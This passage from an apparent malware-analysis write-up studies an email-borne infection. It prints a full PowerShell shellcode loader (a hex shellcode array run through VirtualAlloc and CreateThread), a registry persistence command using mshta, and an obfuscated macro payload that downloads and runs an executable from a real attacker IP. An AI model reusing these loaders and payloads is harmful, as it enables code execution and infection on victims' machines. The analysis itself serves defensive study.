0x85,0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,<#fj#>0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x48,0x85,0xC0,0x72,0x74,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,<#wq#>0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,0x00,0xFB,0xFF,0xFF,<#pl#>0x8B,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,0xFF,<#wiv#>0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x94,<#fh#>0x9D,0x00,<#itv#>0xFB,0xFF,0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,<#pm#>0x81,<#hmh#>0xE2,0xFF,0x00,0x00,0x00,0x32,0x84,0x95,0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,<#xs#>0xFF,0x88,0x04,0x32,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,<#ud#>0x85,0xDA,0x02,0x00,0x00,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,<#zlu#>0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,<#bba#>0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,0x50,0x03,0xDB,0x6A,0x40,0x68,0x00,0x30,<#lbf#>0x00,0x00,0x53,0x6A,0x00,0xFF,0x55,0xA8,<#ye#>0x89,0x45,0xF8,0x83,0x7D,0xF8,<#mnm#>0x00,0x0F,0x84,0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x54,0x50,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x04,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,<#vs#>0xE0,0x00,0x00,0x00,0x50,0x8B,0x45,0xD0,<#dkr#>0x8B,<#alt#>0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,0x8B,0x85,0x4C,0xFF,0xFF,<#dp#>0xFF,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,0x78,<#ewf#>0xFF,0xFF,0xFF,0x6A,0x60,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,<#zfb#>0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x8B,0x95,0x7C,0xFF,<#mts#>0xFF,0xFF,0x03,0x82,0xE0,0x00,0x00,0x00,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,0x7C,0x5F,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x55,0xD4,0x8B,<#dz#>0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,0xD0,0x81,0xC2,0xF8,0x00,0x00,0x00,0x8B,0xCE,0xC1,0xE1,0x03,<#cev#>0x8D,0x0C,<#akx#>0x89,0x03,0xD1,0x89,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x10,0x52,0x8B,0x95,0x50,<#miy#>0xFF,0xFF,0xFF,0x8B,0x52,0x14,0x03,0xD0,0x52,<#wb#>0x8B,<#dwz#>0x85,0x50,0xFF,0xFF,<#bkq#>0xFF,0x8B,<#ijw#>0x40,0x0C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x46,0xFF,0x8D,0x3C,<#xo#>0xFF,0xFF,0xFF,0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,0x34,0x3B,0x45,0xF8,0x0F,0x84,0xCB,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,<#hb#>0x55,0xF8,0x2B,0x50,0x34,0x89,0x55,0xD8,0x8B,0x45,0xF8,0x89,0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,<#lpo#>0xA4,0x00,0x00,0x00,0x00,0x0F,0x86,0x87,0x00,<#lyj#>0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,0x00,0x00,0x00,0x03,0x45,0xF0,0x89,0x45,0xEC,0xEB,0x6E,0x8B,0x45,0xEC,0x8B,0x00,0x03,0x45,<#dxz#>0xF0,0x89,0x45,0xE8,0x8B,0x45,0xEC,0x83,<#vey#>0xC0,0x08,<#rhv#>0x89,0x45,0xE4,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,0x81,0xE1,0xFF,0x0F,<#zaq#>0x0F,0xB7,0xC9,<#tr#>0x83,0xF8,0x03,0x75,0x10,0x8B,0x45,0xE8,0x03,0xC1,0x89,0x45,<#jew#>0xE0,0x8B,<#zf#>0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,0x8D,<#yk#>0x3C,0xFF,0xFF,0xFF,0x75,0xC9,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x03,0x45,0xEC,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x83,0x38,0x00,0x77,<#zgs#>0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,0x45,0xD0,<#ex#>0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,<#se#>0x05,0x80,0x00,0x00,0x00,0x89,0x45,0x90,0x8B,<#xcd#>0x45,0x90,0x83,0x78,0x04,0x00,0x0F,0x86,0x9E,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,<#dwq#>0x80,0x80,0x00,0x00,0x00,0x03,0x45,0xF8,0x89,0x45,0x8C,0xEB,0x7F,0x03,0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x74,0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,0x45,0xF8,<#yrq#>0x89,<#tm#>0x45,0x88,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,0x8B,0x30,0xF7,0xC6,0x00,0x00,0x00,0x80,0x74,<#vs#>0x12,0x81,0xE6,0xFF,0xFF,0x00,0x00,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0xEB,0x10,0x03,0x75,0xF8,0x83,0xC6,0x02,0x56,<#aim#>0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0x83,0x45,0x88,0x04,0x83,0x45,<#fe#>0x84,0x04,0x8B,0x45,0x88,0x83,0x38,0x00,0x75,0xC1,<#uc#>0x83,<#nku#>0x45,0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x8B,0x40,<#kei#>0x28,0x03,0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,0x75,0xF8,0xFF,0x55,0xF4,0x6A,0x00,0xFF,<#ht#>0x55,0xA4,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x8D,0x40,0x00,0x73,0x6F,0x66,0x74,0x77,0x61,0x72,0x65,0x5C,0x44,0x32,0x6B,0x73,0x77,0x72,0x4D,0x00,<#ze#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#bju#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#lza#>0x00,0x00,0x00,0x00,<#ag#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#pvv#>0x00,0x00,0x32,0x53,0x72,0x4A,0x6A,0x57,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xEB,0xB7,0xB8,0x45,0x96,0xD3,0xC3,0x50,0x1F,0x10,0x3C,0x15,0x1A,0x49,0x62,0xE2,0x54,0x9E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#hd#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#ua#>0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,<#rt#>0x6C,0x00,0x3C,0x00,0x3C,0x00,0x3A,0x00,0x3A,0x00,0x3E,0x00,0x3E,0x00,0x73,<#qzz#>0x00,0x68,0x00,0x65,0x00,<#bs#>0x6C,0x00,0x6C,0x00,0x62,0x00,0x70,0x00,0x73,0x00,0x3A,0x00,0x3A,0x00,0x62,0x00,0x70,0x00,0x73,0x00,0x6E,0x00,0x75,0x00,0x6D,0x00,0x3A,0x00,0x38,0x00,0x36,0x00,0x34,0x00,0x3A,0x00,0x6E,0x00,0x75,0x00,0x6D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#ojh#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x12,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,<#cpe#>0x8B,0x75,0x0C,0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,0xA2,0x5F,0xCA,0x03,0x22,0xF7,0x3D,0x68,0xE6,0xB6,0x7E,0x2D,0x93,0x45,0xF5,0x97,0x9F,0x03,0x6A,0xFC,0x8F,0x8E,0xF4,0x53,0x86,<#ar#>0x11,0x83,0xD9,<#in#>0x49,0xC4,<#bf#>0xC7,0x8A,0x18,0x90,0x6E,0x33,0xEA,0xC5,0xED,0x71,0x03,0x3D,0x65,0xEF,0xD0,0x72,0x42,0x9C,0xA9,<#vcy#>0x5E,0xAC,0xB5,0xCD,0x16,0xF7,0xEA,0xAE,0x94,0x92,0xF2,0x84,<#dt#>0x16,0x28,0x3F,0x97,0xF5,0x06,0xC6,0xD0,0xFC,0xE8,<#gqa#>0x07,0x79,0x7E,0xB9,0xAF,0x39,0xCB,0xFB,0x99,0xB9,0xC8,0xD6,0x0C,0x7E;\r\n#asfkcdw\r\n$pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);\r\n#vikeh\r\nif($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));\r\n#hdntdem\r\nfor ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};\r\n#yvvpnxesnh\r\n([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);\r\n#gipzpof\r\n}sleep(1200);}catch{}exit;\r\n#asefiwvg\r\n#hwokblgmtmjsjhvfqwqwxkw<\/pre>\n
From here we can see that the Powershell process spawns a “regsvr32.exe” (PID 3800) and also a child process – “regsvr32.exe” (PID 3948). From what I can tell in Process Explorer, the regsvr.exe:3800 is actively working while the child process (regsvr32.exe:3948) is idle.<\/p>\n
\"\"<\/a><\/p>\n
We can also see that regsvr32.exe:3800 is actively calling back out as well using various IP addresses and ports.<\/p>\n
\"\"<\/a><\/p>\n
One thing to note is that the traffic mentioned above is while my VM was still up and running with this fresh infection. This is most likely why we have a long list of IP addresses that are using port 8080. As for the traffic from the PCAP that is using port 443, I used the following tshark command to get all the traffic that was going to TCP port 443: <\/p>\n
\r\ntshark -r  -T fields -e ip.dst -e tcp.dstport -Y "tcp.dstport eq 443"<\/pre>\n
Once I had that, I then simply cut out the extra space in front of 443 along with 443. That gave me just the raw IP addresses. From here I saved it to a new file and proceeded to use cat and some other pipes to give me the unique IP addresses which gives me the following IP addresses.<\/p>\n
\r\ncat ip-list-443.txt | sort | uniq -d<\/pre>\n
\r\n101.201.145.28\r\n104.16.79.166\r\n104.2.43.48\r\n104.254.150.59\r\n106.92.143.66\r\n107.178.2.119\r\n107.178.254.65\r\n112.163.186.248\r\n123.182.243.161\r\n129.146.12.98\r\n129.146.14.98\r\n131.253.61.84\r\n138.197.231.81\r\n151.101.0.134\r\n151.101.48.134\r\n151.101.48.249\r\n151.101.48.64\r\n157.240.3.24\r\n157.240.3.35\r\n172.217.12.34\r\n172.217.12.65\r\n172.217.12.67\r\n172.217.2.232\r\n172.217.6.141\r\n172.217.6.142\r\n172.217.9.131\r\n172.217.9.162\r\n172.217.9.2\t\r\n173.194.78.103\r\n180.56.6.140\r\n184.173.90.195\r\n185.29.124.182\r\n192.0.77.48\t\r\n198.51.152.184\r\n199.233.57.16\r\n199.59.150.10\r\n204.79.197.200\r\n206.190.37.99\r\n216.155.194.56\r\n216.58.194.104\r\n216.74.32.88\r\n218.157.129.65\r\n23.199.47.47\r\n23.207.50.98\r\n23.215.137.170\r\n31.13.66.5\r\n31.13.66.5\t\r\n52.24.219.132\r\n52.31.59.141\r\n52.54.236.216\r\n52.54.241.223\r\n52.6.162.85\t\r\n54.152.133.101\r\n54.236.2.217\r\n54.243.190.194\r\n60.93.45.190\r\n63.251.240.12\r\n64.233.180.155\r\n64.4.54.254\r\n64.4.54.254\t\r\n69.147.86.11\r\n69.147.86.12\r\n72.21.81.200\r\n74.121.142.57\r\n79.182.3.36\t\r\n91.176.177.198\r\n92.74.131.34\r\n93.234.223.78\r\n98.138.79.21\r\n98.138.81.73<\/pre>\n
Using this site: http:\/\/www.infobyip.com\/ipbulklookup.php<\/a>, I was able to perform a bulk lookup on the IP addresses to give me an idea of who owned what. I still can’t determine what may be legit or not, but at least we have an idea of who owns some of these IP addresses.<\/p>\n
\r\n# Generated by http:\/\/www.infobyip.com\/ipbulklookup.php at 20170505 04:05:07\t\t\t\t\t\t\r\nIP\tDomain\tCountry\tRegion\tCity\tISP\tASN\r\n101.201.145.28\t\tChina\t2\tHangzhou\tHangzhou Alibaba Advertising Co. Ltd.\tAS37963\r\n104.16.79.166\t\tUnited States\tCA\tSan Francisco\tCloudFlare\tAS13335\r\n104.2.43.48\t104-2-43-48.lightspeed.mtryca.sbcglobal.net\tUnited States\tCA\tSalinas\tAT&T Services  Inc.\tAS7018\r\n104.254.150.59\t146.bm-nginx-loadbalancer.mgmt.lax1.adnexus.net\tUnited States\t\t\tAppNexus  Inc\tAS29990\r\n106.92.143.66\t\tChina\t33\tChongqing\tChinanet\tAS4134\r\n107.178.2.119\t107-178-2-119.ptr.nxlink.com\tUnited States\tTX\tMineral Wells\tNextlink Broadband\tAS26077\r\n107.178.254.65\t65.254.178.107.bc.googleusercontent.com\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n112.163.186.248\t\tKorea  Republic of\t20\tJinju\tKorea Telecom\tAS4766\r\n123.182.243.161\t\tChina\t10\tHebei\tChinanet\tAS4134\r\n129.146.12.98\t\tUnited States\tCA\tRedwood City\tOracle Corporation\tAS31898\r\n129.146.14.98\t\tUnited States\tCA\tRedwood City\tOracle Corporation\tAS31898\r\n131.253.61.84\t\tUnited States\t\t\tMicrosoft Corporation\tAS8075\r\n138.197.231.81\t\tUnited States\tNJ\tNorth Bergen\tServerStack  Inc.\tAS46652\r\n151.101.0.134\t\tUnited States\tCA\tSan Francisco\tFastly\tAS54113\r\n151.101.48.134\t\tUnited States\tCA\tSan Francisco\tFastly\tAS54113\r\n151.101.48.249\t\tUnited States\tCA\tSan Francisco\tFastly\tAS54113\r\n151.101.48.64\t\tUnited States\tCA\tSan Francisco\tFastly\tAS54113\r\n157.240.3.24\txx-fbcdn-shv-01-dft4.fbcdn.net\tUnited States\tCA\tMenlo Park\tFacebook  Inc.\tAS32934\r\n157.240.3.35\tedge-star-mini-shv-01-dft4.facebook.com\tUnited States\tCA\tMenlo Park\tFacebook  Inc.\tAS32934\r\n172.217.12.34\tdfw28s04-in-f2.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n172.217.12.65\tdfw28s05-in-f1.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n172.217.12.67\tdfw28s05-in-f3.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n172.217.2.232\tdfw28s01-in-f8.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n172.217.6.141\tdfw25s16-in-f13.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n172.217.6.142\tdfw25s16-in-f14.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n172.217.9.131\tdfw25s26-in-f3.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n172.217.9.162\tdfw25s27-in-f2.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n172.217.9.2\tdfw28s02-in-f2.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n173.194.78.103\toz-in-f103.1e100.net\tUnited States\tWI\tPortage\tGoogle Inc.\tAS15169\r\n180.56.6.140\tp249140-ipngn602fukuhanazo.fukushima.ocn.ne.jp\tJapan\t40\tTokyo\tNTT Communications Corporation\tAS4713\r\n184.173.90.195\tc3.5a.adb8.ip4.static.sl-reverse.com\tUnited States\tTX\tDallas\tSoftLayer Technologies Inc.\tAS36351\r\n185.29.124.182\t\tRussian Federation\t56\t\tJSC Digital Network\tAS12695\r\n192.0.77.48\ts.w.org\tUnited States\tCA\tSan Francisco\tAutomattic  Inc\tAS2635\r\n198.51.152.184\t\tUnited States\tNY\tNew York\tTapad  Inc\tAS62769\r\n199.233.57.16\t\tUnited States\tMD\tElkridge\tLotame Solutions  Inc.\tAS40787\r\n199.59.150.10\tr-199-59-150-10.twttr.com\tUnited States\tCA\tSan Francisco\tTwitter Inc.\tAS13414\r\n204.79.197.200\ta-0001.a-msedge.net\tUnited States\tWA\tRedmond\tMicrosoft Corporation\tAS8068\r\n206.190.37.99\tyts2.yql.vip.gq1.yahoo.com\tUnited States\tCA\tSunnyvale\tYahoo\tAS36647\r\n216.155.194.56\tmpr2.ngd.vip.ne1.yahoo.com\tUnited States\tCA\tSunnyvale\tYahoo\tAS36646\r\n216.58.194.104\tdfw06s48-in-f104.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n216.74.32.88\t216.74.32.88.static.sfo.hosting.com\tUnited States\tCA\tSan Francisco\tHostMySite\tAS20021\r\n218.157.129.65\t\tKorea  Republic of\t1\tJeju\tKorea Telecom\tAS4766\r\n23.199.47.47\ta23-199-47-47.deploy.static.akamaitechnologies.com\tUnited States\tMA\tCambridge\tNTT America  Inc.\tAS2914\r\n23.207.50.98\ta23-207-50-98.deploy.static.akamaitechnologies.com\tUnited States\tMA\tCambridge\tAkamai International B.V.\tAS20940\r\n23.215.137.170\ta23-215-137-170.deploy.static.akamaitechnologies.com\tUnited States\tMA\tCambridge\tAkamai Technologies  Inc.\tAS16625\r\n31.13.66.5\txx-fbcdn-shv-02-dft4.fbcdn.net\tIreland\t\t\tFacebook  Inc.\tAS32934\r\n31.13.66.5\txx-fbcdn-shv-02-dft4.fbcdn.net\tIreland\t\t\tFacebook  Inc.\tAS32934\r\n52.24.219.132\tec2-52-24-219-132.us-west-2.compute.amazonaws.com\tUnited States\tOR\tBoardman\tAmazon.com  Inc.\tAS16509\r\n52.31.59.141\tec2-52-31-59-141.eu-west-1.compute.amazonaws.com\tIreland\t7\tDublin\tAmazon.com  Inc.\tAS16509\r\n52.54.236.216\tec2-52-54-236-216.compute-1.amazonaws.com\tUnited States\tVA\tAshburn\tAmazon.com  Inc.\tAS14618\r\n52.54.241.223\tec2-52-54-241-223.compute-1.amazonaws.com\tUnited States\tVA\tAshburn\tAmazon.com  Inc.\tAS14618\r\n52.6.162.85\tec2-52-6-162-85.compute-1.amazonaws.com\tUnited States\tVA\tAshburn\tAmazon.com  Inc.\tAS14618\r\n54.152.133.101\tec2-54-152-133-101.compute-1.amazonaws.com\tUnited States\tVA\tAshburn\tAmazon.com  Inc.\tAS14618\r\n54.236.2.217\tec2-54-236-2-217.compute-1.amazonaws.com\tUnited States\tVA\tAshburn\tAmazon.com  Inc.\tAS14618\r\n54.243.190.194\tec2-54-243-190-194.compute-1.amazonaws.com\tUnited States\tVA\tAshburn\tAmazon.com  Inc.\tAS14618\r\n60.93.45.190\tsoftbank060093045190.bbtec.net\tJapan\t28\tNara\tSoftbank BB Corp.\tAS17676\r\n63.251.240.12\t\tUnited States\t\t\tVoxel Dot Net  Inc.\tAS29791\r\n64.233.180.155\ton-in-f155.1e100.net\tUnited States\tCA\tMountain View\tGoogle Inc.\tAS15169\r\n64.4.54.254\t\tUnited States\tWY\tCheyenne\tMicrosoft Corporation\tAS8075\r\n64.4.54.254\t\tUnited States\tWY\tCheyenne\tMicrosoft Corporation\tAS8075\r\n69.147.86.11\te1.ycpi.vip.daa.yahoo.com\tUnited States\tCA\tSunnyvale\tInktomi Corporation\tAS14776\r\n69.147.86.12\te2.ycpi.vip.daa.yahoo.com\tUnited States\tCA\tSunnyvale\tInktomi Corporation\tAS14776\r\n72.21.81.200\t\tUnited States\t\t\tMCI Communications Services  Inc. d\/b\/a Verizon Business\tAS15133\r\n74.121.142.57\t\tUnited States\tNY\tNew York\tMediaMath Inc\tAS30419\r\n79.182.3.36\tbzq-79-182-3-36.red.bezeqint.net\tIsrael\t5\tTel Aviv\tBezeq International\tAS8551\r\n91.176.177.198\t\tBelgium\t7\tAndenne\tProximus NV\tAS5432\r\n92.74.131.34\tdslb-092-074-131-034.092.074.pools.vodafone-ip.de\tGermany\t1\tT\u00c3\u00bcbingen\tVodafone GmbH\tAS3209\r\n93.234.223.78\tp5DEADF4E.dip0.t-ipconnect.de\tGermany\t\t\tDeutsche Telekom AG\tAS3320\r\n98.138.79.21\tats1.member.vip.ne1.yahoo.com\tUnited States\tCA\tSunnyvale\tYahoo\tAS36646\r\n98.138.81.73\tr2.ycpi.vip.ne1.yahoo.net\tUnited States\tCA\tSunnyvale\tYahoo\tAS36646<\/pre>\n
Lastly, we can see that the malware gains persistence on the system via some new registry keys. Using Autoruns from SysInternals make this very obvious.<\/p>\n
\"\"<\/a><\/p>\n
Note that the registry key found in the “Run” registry key is hidden and trying to view that registry key gave me an error. <\/p>\n
The batch file seen above calls the file called “c3046d01.e5782001b” which has a new registry entry under the “HKEY_CURRENT_USER\\Software\\Classes\\.e5782001b” path. This key has the value of “fa5574b3.” From what I can gather, this is a pointer to another registry key – HKEY_CURRENT_USER\\Software\\Classes\\fa5574b3\\shell\\open\\command which has the following javascript in it:<\/p>\n
\r\n"C:\\windows\\system32\\mshta.exe" "javascript:lW5jB5="2JM";x38i=new ActiveXObject("WScript.Shell");sxR49pd="R6D";xw9UU8=x38i.RegRead("HKCU\\\\software\\\\lqoiarkklq\\\\txpge");jwZlb7P2R="N100k0";eval(xw9UU8);cXX4uG0m="Ltm";"<\/pre>\n
When we look at the key referenced in that location (HKCU\\\\software\\\\lqoiarkklq\\\\txpge) we have the following value: txpge=czxDiZ85BRH58A==. Another point to add here is that the “regsvr32.exe:3800” process is the one that creates all these keys and seems to also modify them, or delete keys as well from what I can tell in the ProcMon log. There are other values in this key as well that I am not sure about. I have attached all the registry keys from this infection in the artifacts folder. <\/p>\n
Marcus’ System
\n—————-
\nThe email that caused the infection on Marcus’ system was the email from the sender mautzel1982@t-online.de with the subject of “Hi.” The email has an attachment called “see shenandoah memorial hospital” which is a malicious Word document with macros. <\/p>\n
\"\"<\/a><\/p>\n
Looking at the PCAP that was provided, this, much like his brother’s infection, starts off with a request to a compromised website which responds back with what should be a picture of a troll but sends a malicious binary instead.<\/p>\n
\"\"<\/a><\/p>\n
From the network perspective, this is pretty straight forward. Once the malicious Word document has been executed, the embedded script makes a call out to the site hxxp:\/\/185[.]165.29[.]36\/trolls[.]jpg and downloads and runs the malicious binary. From there we see a couple of calls to the site “myexternalip.com” to get the external IP address of the system.<\/p>\n
\"\"<\/a><\/p>\n
Once the external IP has been reported, we then see some TOR traffic to the IP addresses\/domains of 93[.]115.97.242\/www.5jys6cfy2x7vi[.]com and 217[.]79.179.177\/www.tuqrjagtzwxe6swiq3d4imzr[.]com over TCP port 9001. In order to decipher the SSL traffic over port 9001, you have to adjust your settings in Wireshark. I did it by highlighting one of the packets and then choosing ANALYZE –> DECODE AS which opened the box pictured below. I then proceeded to add the port (9001) and that I wanted to have it decoded as SSL.<\/p>\n
\"\"<\/a><\/p>\n
Unfortunately there is no way of seeing what was being exfiled since the data was being sent over SSL. And since this piece of malware is no longer active I could not look at it from within my VM. Hybrid Analysis has a nice breakdown of what happened once the malware was executed on the system which is linked above.<\/p>\n
Since I could not see what the malicious binary could do since it was dead, I decided to see if I could figure out the macro and what it was doing. Using OfficeMalScanner I was able to extract out 5 files, 4 of which were actual code related to the macro. <\/p>\n
\"\"<\/a><\/p>\n
Looking at the different modules, I could see that in Module2 the code (or an aspect of it) was using base64 encoding. Looking through Module4 I could see snippets of code that took a string and assigned it to a variable. That variable would then be concatenated with other variables which would then be assigned to another variable. At the end of the code in Module3, you had all the variables being put back together again as one long base64 statement as shown below:<\/p>\n
\r\nepQ17Zs = athQ1(PuZMUzP & nQ0P3 & UGuJcW & EZz7p & gQy64s & zq6yg27 & XmTPqQVO)<\/pre>\n
Below are the snippets from Module4 that were being created to form the long base64 string along with the decoded base64 string.<\/p>\n
\r\nEncoded base64\r\n\r\nMU6g7wFu = "0aDticmVhazt9Y2F0Y2h7d3JpdGUtaG"\r\nEbpdLjzq = "9zdCAkXy"\r\nGjgUWSBC = "5FeGNlcHRpb24uTWVzc2FnZTt9"\r\nzq6yg27 = MU6g7wFu & EbpdLjzq & GjgUWSBC --> 0aDticmVhazt9Y2F0Y2h7d3JpdGUtaG9zdCAkXy5FeGNlcHRpb24uTWVzc2FnZTt9\r\n\r\nQDYgyXboF = "DbGllbnQ7"\r\nhyeXiu = "JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly8xODUuMTY1LjI5LjM2L3Ryb2"\r\nUkUCM3m = "xscy5qcGcnLlNwbGl0KCcsJy"\r\nUGuJcW = QDYgyXboF & hyeXiu & UkUCM3m --> DbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly8xODUuMTY1LjI5LjM2L3Ryb2xscy5qcGcnLlNwbGl0KCcsJy\r\n\r\nP0yQgWJ = "fQ="\r\nuU52arXLm = Chr(61)\r\nXmTPqQVO = P0yQgWJ & uU52arXLm --> fQ==\r\n\r\naCeuXZ = "k7JG5hbWUgPSAkcmFuZG9tLm5leHQoMSwgNjU1MzYpOyRwYXRoID0gJGVu"\r\nrbam4V = "djp0ZW1wICsgJ1wnICsgJG5hbWUgKyAnLmV4ZSc7Zm9yZWFjaCgkdXJsIGlu"\r\nEZz7p = aCeuXZ & rbam4V --> k7JG5hbWUgPSAkcmFuZG9tLm5leHQoMSwgNjU1MzYpOyRwYXRoID0gJGVudjp0ZW1wICsgJ1wnICsgJG5hbWUgKyAnLmV4ZSc7Zm9yZWFjaCgkdXJsIGlu\r\n\r\nmFMSLTwJU = "cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iam"\r\nBj6mX = "VjdCAtQ29tT2JqZWN0IF"\r\nPuZMUzP = mFMSLTwJU & Bj6mX --> 